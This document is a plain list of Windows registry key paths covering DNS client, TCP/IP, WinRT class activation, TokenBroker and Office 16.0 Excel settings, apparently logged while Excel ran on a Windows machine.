HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpandedLines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FormulaBarExpanded
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\WinSock_Registry_Version
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartNameResolution
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\PreferLocalOverLowerBindingDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\QueryNetBTFQDN
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableSmartProtocolReordering
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UdpRecvBufferSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableParallelAandAAAA
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableCoalescing
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\FilterVPNTrigger
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMultiHomedRouteConflicts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ForceQueriesOverTcp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShareTcpConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableServerUnreachability
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMulticast
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\NewDhcpSrvRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DirectAccessPreferLocal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableIdnEncoding
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableIdnMapping
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\ShortnameProxyDefault
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DisableNRPTForAdapterRegistration
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutHistoryLength
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16924&crev=3\0\EndDate
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseCategoryInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsURL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseSKUInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\ProviderId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\TrustedSiteUrlForUserAgentVersionInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Diagnostics.AsyncCausalityTracer\ActivationType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ActivatableClasses
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ServerType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\Server\TokenBroker\ExplicitPsmActivationType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InitFolderHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{07650A66-66EA-489D-AA90-0DABC75F3567}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NameBoxWidth
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{AF86E2E0-B12D-4C6A-9C5A-D7AA65101E90}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{57D369EE-7364-4AB0-A307-BDD25BCE408C}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADALEnvironment
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Web.WamProviderRegistration\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{E60E20A2-87A0-4B34-8502-EE3B8FB4EC16}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{63A0A1E5-F8FE-4BA6-8508-CAEF1277DD35}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Credentials.WebAccountProviderInternal\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequest\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\DisableExtensions
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ProviderIds
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ExtensionType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ExtensionCapabilities
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ProviderIds
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ExtensionType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\TokenBroker\Extensions\Windows.Internal.Security.Authentication.OnlineId.MicrosoftAccountWAMExtension\ExtensionCapabilities
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-932793227-1321892499-785312009-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MsoTbCust
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CmdBarData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\BtnSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Tooltips
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\EnablePaneManagement
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.Security.Authentication.Aad.AadWamExtension\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings\Microsoft Excel AWDropdownHidden
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAccChecker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.ValueSet\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.PropertyValue\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataWriter\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\DllPath
